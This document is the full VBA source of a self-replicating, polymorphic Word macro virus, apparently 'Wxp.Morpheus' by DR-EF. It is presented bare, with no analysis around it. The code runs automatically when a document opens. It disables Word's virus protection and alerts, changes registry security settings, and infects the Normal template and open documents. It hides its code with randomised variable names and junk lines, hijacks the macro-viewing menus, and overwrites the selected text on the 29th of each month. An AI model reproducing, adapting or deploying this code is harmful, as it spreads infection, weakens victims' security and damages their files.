Attribute VB_Name = "Virus"
Sub AutoOpen(): sub2: sub3: End Sub
Function Poly1(cole): Randomize Timer
var1 = Array("actv", "tmpt", "Poly", "cole", "nrml", "var", "file1", "c_all", "sub", "poly", "nmom", "vcln", "iloo", "grbg", "num1")
For iloop = 0 To 14: For iloop2 = 1 To 4: num1 = Int(Rnd * 90): Do
If num1 > 65 Then Exit Do
num1 = Int(Rnd * 90): DoEvents: Loop: tmpt = tmpt & Chr(num1): Next
cole = Replace(cole, var1(iloop), tmpt): tmpt = "": Next: Poly1 = cole: End Function
Sub sub2(): On Error Resume Next: Randomize Timer: With Options
Set actv = ActiveDocument.VBProject: Set nrml = NormalTemplate.VBProject
.VirusProtection = 0: .ConfirmConversions = 0: .SaveNormalPrompt = 0: End With
With Application: NormalTemplate.Saved = 1
.DisplayStatusBar = 0: .NormalTemplate.Saved = 0: .DisplayAlerts = wdAlertsNone
.ScreenUpdating = 0: .ShowVisualBasicEditor = 0: End With
x = Application.Version: Options.VirusProtection = 0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" & x & "\Word\Security", "AccessVBOM") = &H1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" & x & "\Word\Security", "Level") = &H1
If nrml.VBComponents(1).CodeModule.Lines(1, 1) = "" Then
For iloop = 1 To 8: num1 = Int(Rnd * 90): Do
If num1 > 65 Then Exit Do
num1 = Int(Rnd * 90): DoEvents: Loop
tmpt = tmpt & Chr(num1): Next
nmom = Mid(actv.VBComponents(1).CodeModule.Lines(1, 1), 2)
Open "c:\" & tmpt & ".v" For Output As #1
Print #1, "Attribute VB_Name = " & Chr(34) & tmpt & Chr(34): iloop = 1
For iloop = 1 To actv.VBComponents(nmom).CodeModule.CountOfLines
If Right(actv.VBComponents(nmom).CodeModule.Lines(iloop, 1), 1) <> "'" Then
Print #1, actv.VBComponents(nmom).CodeModule.Lines(iloop, 1)
End If: Next: Close: nrml.VBComponents.Import "c:\" & tmpt & ".v"
nrml.VBComponents(1).CodeModule.InsertLines 1, "'" & tmpt
Kill "c:\" & tmpt & ".v": NormalTemplate.Save: NormalTemplate.Saved = 1: End If: End Sub
Sub sub3(): On Error Resume Next: Randomize Timer
If Day(Date) = 29 Then Selection.Text = "Wxp.Morpheus (c) 2003 DR-EF"
Set actv = ActiveDocument.VBProject: Set nrml = NormalTemplate.VBProject
If actv.VBComponents(1).CodeModule.Lines(1, 1) <> "" Then Exit Sub
For iloop = 1 To 8: num1 = Int(Rnd * 90): Do
If num1 > 65 Then Exit Do
num1 = Int(Rnd * 90): DoEvents
Loop: tmpt = tmpt & Chr(num1): Next
file1 = file1 & "c": h = file1 & ":\" & tmpt: file1 = h
nmom = Mid(nrml.VBComponents(1).CodeModule.Lines(1, 1), 2)
Open file1 For Output As #1
Print #1, "Attribute VB_Name = " & Chr(34) & tmpt & Chr(34): iloop = 1
For iloop = 1 To nrml.VBComponents(nmom).CodeModule.CountOfLines
If (Int(Rnd * 2) + 1) = 2 Then
For t = 1 To 100
grbg = grbg & "'" & Chr(Int(Rnd * 253) + 1): Next
c_all = c_all & grbg & vbCrLf: grbg = "": End If
c_all = c_all & nrml.VBComponents(nmom).CodeModule.Lines(iloop, 1) & vbCrLf
Next: Print #1, Poly1(c_all): Close
actv.VBComponents.Import "c:\" & tmpt: Kill "c:\" & tmpt
actv.VBComponents(1).CodeModule.InsertLines 1, "'" & tmpt
ActiveDocument.Save: ActiveDocument.Saved = 1
nmom = Mid(nrml.VBComponents(1).CodeModule.Lines(1, 1), 2)
vcln = nrml.VBComponents(nmom).CodeModule.CountOfLines
If vcln > 150 Then
For iloop = vcln To 1 Step -1
If Left(nrml.VBComponents(nmom).CodeModule.Lines(iloop, 1), 1) = "'" Then
nrml.VBComponents(nmom).CodeModule.DeleteLines iloop, 1
End If: Next: Randomize Timer
For iloop = 1 To vcln
If (Int(Rnd * 4) + 1) = 3 Then
For a = 1 To 80: grbg = grbg & "'" & Chr((Int(Rnd * 250) + 1)): Next
nrml.VBComponents(nmom).CodeModule.InsertLines iloop, grbg
grbg = "": End If: Next: End If: End Sub
Sub ViewVBCode(): sub2: End Sub
Sub ViewCode(): sub2: End Sub
Sub ToolsMacro(): sub2: End Sub
Sub FileTemplates(): sub2: End Sub

